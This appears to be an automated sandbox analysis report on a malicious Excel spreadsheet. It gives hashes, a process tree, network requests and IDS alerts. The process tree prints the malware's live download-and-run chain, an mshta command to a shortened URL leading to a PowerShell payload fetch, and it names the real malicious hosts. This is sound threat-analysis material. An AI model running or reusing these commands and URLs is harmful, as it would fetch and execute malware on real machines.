File name: | a44bcc5459f5d3b6a115bc50a7403fd85721acaecf0a4ac9b4e025df4d796845.xls |
Full analysis: | https://app.any.run/tasks/8382ae5e-81eb-40b6-9fe1-3ebd3d997558 |
Verdict: | Malicious activity |
Analysis date: | April 24, 2019, 01:46:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Mon Apr 22 19:28:18 2019, Security: 0 |
MD5: | DE611846537F549B214973A367659F4E |
SHA1: | CFB375118D1728E1184F8A02A6266C8637B518F4 |
SHA256: | A44BCC5459F5D3B6A115BC50A7403FD85721ACAECF0A4AC9B4E025DF4D796845 |
SSDEEP: | 768:v2K1Tgbyw3sz2jyngov9rjXjBCKTUAuulFFVgiqW3E:OK1Tgbyw3sz2jyngov9rjXjBCKoAuul8 |
.xls | Microsoft Excel sheet (78.9) |
Author: | - |
LastModifiedBy: | - |
Software: | Microsoft Excel |
CreateDate: | 2015:06:05 18:19:34 |
ModifyDate: | 2019:04:22 18:28:18 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | Plan1 |
HeadingPairs: | |
CompObjUserTypeLen: | 34 |
CompObjUserType: | Planilha do Microsoft Excel 2003 |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2208 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe
936 | mshta http://www.bitly.com/MsgUpSentVin | C:\Windows\system32\mshta.exe | — | EXCEL.EXE
3896 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 2 > nul & cmd /c taskkill /f /im WINWORD.EXE & exit | C:\Windows\System32\cmd.exe | — | mshta.exe
1796 | ping 127.0.0.1 -n 2 | C:\Windows\system32\PING.EXE | — | cmd.exe
2592 | cmd /c taskkill /f /im WINWORD.EXE | C:\Windows\system32\cmd.exe | — | cmd.exe
3984 | taskkill /f /im WINWORD.EXE | C:\Windows\system32\taskkill.exe | — | cmd.exe
1412 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 3 > nul & cmd /c taskkill /f /im EXCEL.EXE & exit | C:\Windows\System32\cmd.exe | — | mshta.exe
3128 | ping 127.0.0.1 -n 3 | C:\Windows\system32\PING.EXE | — | cmd.exe
2648 | cmd /c taskkill /f /im EXCEL.EXE | C:\Windows\system32\cmd.exe | — | cmd.exe
1668 | taskkill /f /im EXCEL.EXE | C:\Windows\system32\taskkill.exe | — | cmd.exe

PID | User | Company | Integrity Level | Description | Exit code | Version
---|---|---|---|---|---|---
2208 | admin | Microsoft Corporation | MEDIUM | Microsoft Excel | 1 | 14.0.6024.1000
936 | admin | Microsoft Corporation | MEDIUM | Microsoft (R) HTML Application host | | 8.00.7600.16385 (win7_rtm.090713-1255)
3896 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 128 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1796 | admin | Microsoft Corporation | MEDIUM | TCP/IP Ping Command | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
2592 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 128 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3984 | admin | Microsoft Corporation | MEDIUM | Terminates Processes | 128 | 6.1.7600.16385 (win7_rtm.090713-1255)
1412 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3128 | admin | Microsoft Corporation | MEDIUM | TCP/IP Ping Command | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
2648 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1668 | admin | Microsoft Corporation | MEDIUM | Terminates Processes | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2208 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR5CB2.tmp.cvr | — | — | —
2208 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF44C7611FF97DB07E.TMP | — | — | —
868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8WEB9QOMJQJ25DZR3H8Y.temp | — | — | —
936 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\comando[1].htm | html | C88C580470820DF5DFB725E4CF6950A6 | 7FCABA43D352FF1CC4AF2E097F73EE86844A6CF175E7D9C0813DEFCD1FA1A207
2208 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFBFC95DE18448AE21.TMP | binary | B112A595FD6A76F30355F1A247E3558F | 232F01299AF9F2B25A5FB57061FEC3E2391EB5F36E9DFB3775595AA3D7F44D2D
868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf2ac0.TMP | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
936 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txt | text | 36FBCEFA0C62A135A6A9DBEB88767981 | F9A98D9C45D7C54E64096B2E2E040EE4B7FD030CD42B6572D928C53A85A04624
868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
---|---|---|---|---|---|---|---|---|---
936 | mshta.exe | GET | — | 177.12.161.211:80 | http://gabrielfaller.com.br/image/comando.html | BR | — | — | unknown
936 | mshta.exe | GET | 301 | 67.199.248.15:80 | http://bitly.com/MsgUpSentVin | US | html | 133 b | shared
868 | powershell.exe | GET | 200 | 177.12.161.211:80 | http://gabrielfaller.com.br/image/base.mp3 | BR | text | 544 Kb | unknown
936 | mshta.exe | GET | 301 | 67.199.248.15:80 | http://www.bitly.com/MsgUpSentVin | US | html | 178 b | shared
PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
936 | mshta.exe | 177.12.161.211:80 | gabrielfaller.com.br | IPV6 Internet Ltda | BR | unknown
— | — | 152.245.202.67:7000 | olhomagicocdt.duckdns.org | TELEFÔNICA BRASIL S.A | BR | unknown
868 | powershell.exe | 177.12.161.211:80 | gabrielfaller.com.br | IPV6 Internet Ltda | BR | unknown
936 | mshta.exe | 67.199.248.15:80 | www.bitly.com | Bitly Inc | US | shared
Domain | IP | Reputation
---|---|---
www.bitly.com | | shared
gabrielfaller.com.br | | unknown
olhomagicocdt.duckdns.org | | malicious
PID | Process | Class | Message
---|---|---|---
936 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
936 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
868 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable base64 Payload
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain